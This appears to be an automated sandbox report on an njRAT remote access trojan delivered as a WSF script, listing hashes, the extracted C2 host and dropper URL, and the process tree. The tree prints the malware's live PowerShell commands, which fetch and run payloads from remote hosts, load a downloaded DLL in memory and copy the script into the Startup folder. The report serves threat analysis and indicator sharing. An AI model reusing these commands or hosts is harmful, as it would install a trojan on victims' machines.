Analysis

  • max time kernel
    91s
  • max time network
    100s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/10/2022, 17:04

General

  • Target

    1f9af4f8289740daa05ccfead19a29a9.wsf

  • Size

    53KB

  • MD5

    1f9af4f8289740daa05ccfead19a29a9

  • SHA1

    4c8703ecd5c150015f0e49243119ad26d672fe06

  • SHA256

    86f4317f0c4ae86c9a37a380a1bcd18a0bef3077a808b93110cd774697c66439

  • SHA512

    59acad54bf9274550bfa345b00bd7015bee7dec231fb562490aa2459383698a59b4d4658af575fea78300adaf0f580de04227c2a749f87f8daf37e63bf1ce124

  • SSDEEP

    192:L48w8Nlb0bqGW6CCCuqpSS48w8Nlb0bqGW6CCCuqpd48w8Nlb0bqGW6CCCuqpJ:dwSb0cJqUwSb0cJzwSb0cJR

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://tinyurl.com/2erph6cs

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

wins0310ok.duckdns.org:8000

Mutex

2a624df8c6c4469

Attributes
  • reg_key

    2a624df8c6c4469

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1f9af4f8289740daa05ccfead19a29a9.wsf"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2492
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1026576632913342517/1027267777003802644/008.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('ایسش.wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ایسش.wsf');Start-Sleep 1;rm *.pif,*.uue
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1368
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs
        3⤵
          PID:3532
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4060
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\nLeNPdi.vbs"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2072
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwCsAK8A+gDwAOQAugDXAOQAJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBzAHkAcwB0AG⌚⌚⌚AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHQAaQBuAHkAdQByAGwALgBjAG8AbQAvADIAZQByAHAAaAA2AGMAcwAnACkAKQA7AFsAcwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⌚⌚⌚AcgByAG⌚⌚⌚AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⌚⌚⌚AKAAnAE4AdwBnAG8AeABNAC4ASwBQAEoAYQBOAGoAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFAAVQBsAEcASwBBACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⌚⌚⌚AbABsACwAIABbAG8AYgBqAG⌚⌚⌚AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AMAAwADAAOAB0AGMAbwAzADAALwA2ADEANgAzADIANAAxADAAOQA5ADEANAA2ADcANQA2ADIAMAAxAC8AMgAzADQANgA2ADAAMQA5ADQAOAA3ADYANQA3AD⌚⌚⌚ANgAyADAAMQAvAHMAdABuAG⌚⌚⌚AbQBoAGMAYQB0AHQAYQAvAG0AbwBjAC4AcABwAGEAZAByAG8AYwBzAGkAZAAuAG4AZABjAC8ALwA6AHMAcAB0AHQAaAAnACAALAAgACQA⌚⌚⌚gBvAGQAYQBDAG8AcAB5ACAALAAgACcAJwbMBjMGNAYnACAAKQApAA==';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('¬¯úðäº×ä', 'C:\Windows\Temp\nLeNPdi.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1612
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Windows\Temp\nLeNPdi.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://tinyurl.com/2erph6cs'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('txt.0008tco30/6163241099146756201/2346601948765756201/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $RodaCopy , 'ایسش' ))"
            4⤵
            • Blocklisted process makes network request
            • Drops startup file
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4792
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1148
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /C Y /N /D Y /T 1 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                6⤵
                  PID:580

      Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              3KB

              MD5

              f41839a3fe2888c8b3050197bc9a0a05

              SHA1

              0798941aaf7a53a11ea9ed589752890aee069729

              SHA256

              224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

              SHA512

              2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              b8a507ea87f4db23962b175b90889f86

              SHA1

              d7957c02ed987bbf866c98e4491a926b5453c58d

              SHA256

              291a53a8822be2c1b654a400ccd6fbbbf90712d4eb2078ccd2d10824d4de4e2b

              SHA512

              23c6774e1c2bb07e9eb814b60b040ebaea933bc664b9eebfa741495e89a8568ff86653b4efa58595fa94f7aff0216d132db96a871ca78600fea3e5c08b9d2bea

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              64B

              MD5

              5caad758326454b5788ec35315c4c304

              SHA1

              3aef8dba8042662a7fcf97e51047dc636b4d4724

              SHA256

              83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

              SHA512

              4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

            • C:\Windows\Temp\nLeNPdi.vbs

              Filesize

              217KB

              MD5

              12acd97038a0f71c7798a9f23da80c78

              SHA1

              6f71758dd0ab7d57bb6886b8b10658d476aa2391

              SHA256

              abdcf0cce360090b0d36306cd6cd6d460904993eaafb2b3fa70b6bc56210558e

              SHA512

              dedd4b55ede48c6b7e376933ad9a8f58b25d0aea3a48c8d461a2988463dcb97025cb2cb8ce98e2994a3d00bb515aaed6671eac0d110115cad56e53f5b049efa9

            • memory/1148-150-0x0000000005110000-0x00000000051AC000-memory.dmp

              Filesize

              624KB

            • memory/1148-151-0x0000000005760000-0x0000000005D04000-memory.dmp

              Filesize

              5.6MB

            • memory/1148-154-0x00000000055D0000-0x0000000005636000-memory.dmp

              Filesize

              408KB

            • memory/1148-153-0x0000000005340000-0x000000000534A000-memory.dmp

              Filesize

              40KB

            • memory/1148-152-0x0000000005380000-0x0000000005412000-memory.dmp

              Filesize

              584KB

            • memory/1148-142-0x0000000000400000-0x000000000040C000-memory.dmp

              Filesize

              48KB

            • memory/1368-147-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

              Filesize

              10.8MB

            • memory/1368-134-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

              Filesize

              10.8MB

            • memory/1368-133-0x00000251C1300000-0x00000251C1322000-memory.dmp

              Filesize

              136KB

            • memory/1612-149-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

              Filesize

              10.8MB

            • memory/1612-139-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

              Filesize

              10.8MB

            • memory/4792-146-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

              Filesize

              10.8MB

            • memory/4792-141-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

              Filesize

              10.8MB